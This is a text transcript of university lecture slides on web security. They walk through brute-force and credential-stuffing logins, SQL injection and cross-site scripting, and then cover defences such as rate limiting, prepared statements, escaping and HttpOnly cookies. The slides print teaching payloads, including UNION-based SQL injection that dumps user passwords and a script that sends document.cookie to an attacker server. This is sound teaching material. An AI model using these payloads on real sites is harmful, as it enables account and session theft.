Top Banner
eb Security Web Programming yslin@DataLAB 1
78

Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

May 29, 2020

Download

Documents

dariahiddleston
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Web SecurityWeb Programming

yslin@DataLAB

1

Page 2: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Rank Name1 Injection2 Broken Authentication and Session Management3 Cross-Site Scripting (XSS)4 Broken Access Control5 Security Misconfiguration6 Sensitive Data Exposure7 Insufficient Attack Protection8 Cross-Site Request Forgery (CSRF) 9 Using Components With Known Vulnerabilities10 Underprotected APIs

OWASP Top 10 Security Risks in 2017

https://www.owasp.org/index.php/Top_10_2017-Top_102

Page 3: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Brute-Force Attacks

3

Page 4: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Username:

Password:

4

Page 5: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password:

5

Page 6: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00000

6

Page 7: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00000Close

Wrong Password

7

Page 8: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00001

8

Page 9: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00000Close

Wrong Password

9

Page 10: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00002

10

Page 11: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00000Close

Wrong Password

11

Page 12: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

12

Page 13: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 04876

13

Page 14: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 04876Close

Access Granted

Usually hackers doing this using scripts

14

Page 15: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

How to Defense ?Limit how many times a user can try to login in a given time

window.

Rate Limiter - A Node.js library

15

Page 16: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00002

16

Page 17: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

adminUsername:

Password: 00000Close

Please Try It 5 minutes Later

17

Page 18: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

But May Not Work To Credential Stuffing

18

Page 19: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Username Password

user pass

admin admin

brandon wu

cat meow

nthu uhtn

aaa bbb

abcde 12345

A list of known username-password pairs obtained from another service

cat

Username:

Password: meow

19

Page 20: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Here is the list of prevention strategies

20

Page 21: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

SQL Injections

21

Page 22: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Username:

Password:

22

Page 23: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

functionget(username,password){constsql=`SELECT*FROMusersWHEREusername='${username}'ANDpassword='${password}'`;returndb.any(sql);}

Page 24: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

catUsername:

Password: meow

SELECT*FROMusersWHEREusername='cat'ANDpassword='meow'

username password namecat meow A Cat

Page 25: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

SQL InjectionsUsers Do What You Do Not Expect

Page 26: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

catUsername:

Password: 1' OR '1' = '1

SELECT*FROMusersWHEREusername='cat'ANDpassword='1'OR'1'='1'

username password name

admin AAAAAAAA Adminstrator

cat meow A Cat

dog bow A Dog

bird chou A Bird

Page 27: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

If your server will return the results directly…

(e.g. message boards)

Page 28: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

id title message

1 HL3 When can I see Half-Life 3 coming out ?

http://mywebsite.com/posts?id=1

28

SELECTtitle,messageFROMpostsWHEREid=1

Page 29: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

A Powerful Keyword

UNION

Page 30: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

UNIONSELECTtitle,messageFROMposts SELECTusername,passwordFROMusers

title message

Knock Knock knock

username passwordadmin AAAAAAAA

cat meow

SELECTtitle,messageFROMpostsUNIONSELECTusername,passwordFROMusers

title messageKnock Knock knockadmin AAAAAAAA

cat meow

Page 31: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users

31

SELECTtitle,messageFROMpostsWHEREid=-1UNIONSELECTusername,passwordFROMusers

title message

admin AAAAAAAA

cat meow

dog bow

bird chou

Page 32: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Wait !!!!How Did He/She Know What Tables I Have ?

Page 33: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://mywebsite.com/posts?id=-1 UNION SELECT table_name, column_name FROM

information_schema.columns WHERE table_schema = 'public';

Page 34: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

SELECTtitle,messageFROMpostsWHEREid=-1UNIONSELECTtable_name,column_nameFROMinformation_schema.columnsWHEREtable_schema='public';

title messageusers idusers usernameusers bowusers nameposts idposts titleposts message

Page 35: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

What If There Are Something Behind the id in The Query ?

SELECTtitle,messageFROMpostsWHEREid=...ANDmsg_type='public'

Page 36: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

--(comment mark)

p.s. the mark may be different in different database systems

Page 37: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users --

37

SELECTtitle,messageFROMpostsWHEREid=-1UNIONSELECTusername,passwordFROMusers--ANDmsg_type='public'

It becomes comments

Page 38: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

WTF38

Page 39: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Live Demohttps://github.com/SLMT/very-secure-website

Page 40: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

The core problem is:The clients’ inputs may be treated as SQL keywords

Prepare Statements !!

Page 41: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

functionget(username,password){constsql=`SELECT*FROMusersWHEREusername='$<username>'ANDpassword='$<password>'`;returndb.any(sql,{username,password});}

Your data go here

Page 42: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

More Information

• What you just saw is a kind of syntax provided by pg-promise

• You can learn more information about prepared statements on their documents:

• https://github.com/vitaly-t/pg-promise/wiki/Learn-by-Example#prepared-statements

Page 43: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Cross-Site Scripting (XSS)

43

Page 44: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Scenario 1

44

Page 45: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

User: SLMTSteam winter sale starts !!

User: MIT Bro

Please type in your message here…

45

My wallet is ready !!

Page 46: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

<script>alert(“meow”);</script>

46

User: SLMTSteam winter sale starts !!

User: MIT BroMy wallet is ready !!

Page 47: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

<script>alert(“meow”);</script>

47

User: SLMTSteam winter sale starts !!

User: MIT BroMy wallet is ready !!

User: SLMT

Page 48: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

User: SLMTSteam winter sale starts !!

User: MIT BroMy wallet is ready !!

User: SLMTClose

meow

48

Page 49: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

49

Page 50: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

But it is just a prankHow can a bad guy use it ?

50

Page 51: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Yummy !

Cookie is stored in client-side. It usually contains some sensitive data.

E.g. The key for the server to identify a user

51

Page 52: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Cookie can be retrieved using javascript

Try to open a console of a browser, and type in document.cookie

52

Page 53: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

<script>location.href=("http://myserver.com/somepage?cookie=" + document.cookie);</script>

53

User: SLMTSteam winter sale starts !!

User: MIT BroMy wallet is ready !!

Page 54: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://myserver.com/somepage?cookie=

54

Page 55: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Lots of websites having message boards had such vulnerabilities before.

So, the website without such functions are safe ?

Not exactly55

Page 56: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Scenario 2

56

Page 57: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://somewebsite.com/showimage?id=1

You are watching an image with id = 1

57

Page 58: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://somewebsite.com/showimage?id=a

58

You are watching an image with id = a

Page 59: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

http://somewebsite.com/showimage?id=<script>al…

確定

meow

59

You are watching an image with id =

Page 60: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Hi~

Hello~

A cute cat !! http://goo.gl/abcdef

http://somewebsite.com/showimage?id=<script>location.href=(“http://myserver.com/somepage?cookie=" + document.cookie);</script>

60

Page 61: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

WTF x 261

Page 62: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Cross-Site ScriptingCross site to retrieve sensitive data

Using scripts to attack

62

Page 63: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

How To Defense ?

63

Page 64: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Lots of filtering methodsBut, there are also lots of ways to bypass

1. Filtering

64

Page 65: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Filtering Method 1

Removing all <script> words

But using <SCRIPT> will be safe.

65

Page 66: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Filtering Method 2

Replace all script

But, <scscriptript> becomes <script>

66

Page 67: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Learning Filtering Methods

• Some practice websites

• alert(1) to win

• If you cannot see the page, try to replace ‘https’ with ‘http’

• prompt(1) to win

67

Page 68: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

2. Escaping

68

Page 69: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

<script>alert("meow");</script>

&lt;script&gt;alert(&quot;meow&quot;);&lt;/script&gt;

Lots of Framework have provide such built-in functions

69

Page 70: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

3. Browser-support Headers

70

Page 71: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Headers• X-XSS-Protection: 1

• Works in Chrome, IE (>= 8.0), Edge, Safari, Opera

• The browsers will detect possible XSS attacks for you.

• Set-Cookie: HttpOnly

• Disallow the scripts to retrieve

• can only be retrieved by HTTP requests

• More here

71

Page 72: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

However, according to a research of a famous security company…

72

Only 20% of websites in Taiwan using those headers.

Only 7.8% of websites using more than two such headers.

Page 73: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Some XSS Practices

• XSS Challenges

• XSS Game (Recommend to open using Chrome)

73

Page 74: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Resource

74

Page 75: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

OWASP Node.js Goat

• An example project to learn how common security risks apply to web applications developed using Node.js

• https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project

Page 76: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Checklists• Node.js Security Checklist

• A checklist for developers to prevent security risks on Node.js.

• Security Checklist Developers

• A general security checklist for backend developers

Page 77: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

HITCON Zero Days• A website for users to report the vulnerabilities they

found.

• https://zeroday.hitcon.org/

Page 78: Web Security - GitHub Pages€¦ · 2 Broken Authentication and Session Management 3 Cross-Site Scripting (XSS) 4 Broken Access Control 5 Security Misconfiguration 6 Sensitive Data

Thank You